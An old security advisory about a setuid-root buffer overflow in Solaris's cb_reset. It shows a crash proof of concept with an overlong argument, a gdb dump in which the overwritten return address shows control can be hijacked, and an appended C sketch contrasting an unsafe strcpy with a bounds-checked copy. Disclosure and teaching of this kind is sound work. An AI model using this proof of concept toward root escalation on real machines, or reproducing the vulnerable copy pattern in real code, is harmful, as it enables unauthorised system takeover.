Solaris /opt/SUNWssp/bin/cb_reset Buffer Overflow Vulnerability

/ns/ld/unix/data/20010623110018.htm


Affected program:
/opt/SUNWssp/bin/cb_reset

Description:
Solaris /opt/SUNWssp/bin/cb_reset local buffer overflow vulnerability

Details:
A buffer overflow vulnerability was recently found in cb_reset from the Solaris SUNWssp package (which is not part of a standard Solaris installation). The program is installed setuid root, yet it does not properly check its input arguments. A local attacker who exploits this vulnerability can execute arbitrary code on an affected machine.


The following is provided only for testing and researching this vulnerability; if you put it to improper use, you bear the consequences yourself.


$ uname -a
SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10

$ ls /tftpboot/cb_port
/tftpboot/cb_port


$ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
Resetting host
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ether_hostton(SrcHost:laika): No such file or directory
ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA): No such file or directory
Bus Error (core dumped)


$ gdb /opt/SUNWssp/bin/cb_reset --core=core
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)...
Core was generated by `/opt/SUNWssp/bin/cb_reset
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 10, Bus Error.
Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
(no debugging symbols found)...done.
Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
Reading symbols from /opt/SUNWssp/lib/liblogger.so...
(no debugging symbols found)...done.


[...]


Loaded symbols for /usr/lib/nss_files.so.1
#0 0x1219c in cb_send_frame ()
(gdb) info registers
g0 0x0 0
g1 0xff195b80 -15115392
g2 0xff322630 -13490640
g3 0xff332d78 -13423240
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x13278 78456
o1 0xff1bbab8 -14959944
o2 0xff1b8018 -14974952
o3 0x13278 78456
o4 0x13258 78424
o5 0xffbedb71 -4269199
sp 0xffbedb18 -4269288
o7 0x1218c 74124
l0 0xc3c3c3c3 -1010580541
l1 0x41414141 1094795585
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x4141414d 1094795597
i5 0x41414141 1094795585
fp 0x41414141 1094795585
i7 0x41414141 1094795585 (***)
y 0xb 11
psr 0xfe801001 -25161727
wim 0x0 0
tbr 0x0 0
pc 0x1219c 74140
npc 0x121a0 74144
fpsr 0x0 0
cpsr 0x0 0
(gdb)
--
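As an added illustration (not code from this advisory or from Sun), the pattern the advisory describes, written out in C: an unbounded copy of the host-name argument into a fixed stack buffer, beside a hardened form that checks the argument's length and character set before any copy. The buffer size and the function names are assumptions; cb_reset's real internals are not on the page.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define HOST_BUF 64   /* assumed size; cb_reset's real buffer size is unknown */

/* Vulnerable pattern (assumed to mirror cb_reset): an unbounded copy of the
 * host-name argument into a fixed stack buffer. A 600-byte argument runs over
 * the saved registers of the frame, including the SPARC return address (i7). */
void reset_host_unsafe(const char *host)
{
    char dst[HOST_BUF];
    strcpy(dst, host);               /* no length check at all */
    printf("Resetting host %s\n", dst);
}

/* Hardened form: reject over-long or malformed names before copying, and copy
 * with an explicit bound. Returns 0 on success, -1 (errno = EINVAL) otherwise. */
int copy_hostname(char *dst, size_t dstlen, const char *src)
{
    size_t n = 0;
    while (n < dstlen && src[n] != '\0') n++;   /* never scans past dstlen */
    if (n == 0 || n >= dstlen) {                 /* empty, or no room for NUL */
        errno = EINVAL;
        return -1;
    }
    for (size_t i = 0; i < n; i++) {     /* host names: letters, digits, '-', '.' */
        unsigned char c = (unsigned char)src[i];
        if (!isalnum(c) && c != '-' && c != '.') {
            errno = EINVAL;
            return -1;
        }
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* What a setuid helper should do: validate, then act; fail closed on bad input. */
int reset_host_safe(const char *host)
{
    char dst[HOST_BUF];
    if (copy_hostname(dst, sizeof dst, host) != 0) {
        fprintf(stderr, "cb_reset: invalid host name argument\n");
        return 1;
    }
    printf("Resetting host %s\n", dst);   /* ether_hostton(dst, ...) would follow */
    return 0;
}
```

With this check in place, the 600-byte "A" argument from the crash log above is rejected with a usage error instead of overwriting the frame.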

Tested system:
SunOS 5.8

Solution:
Sun has not yet responded; users are advised to stop using this software for the time being.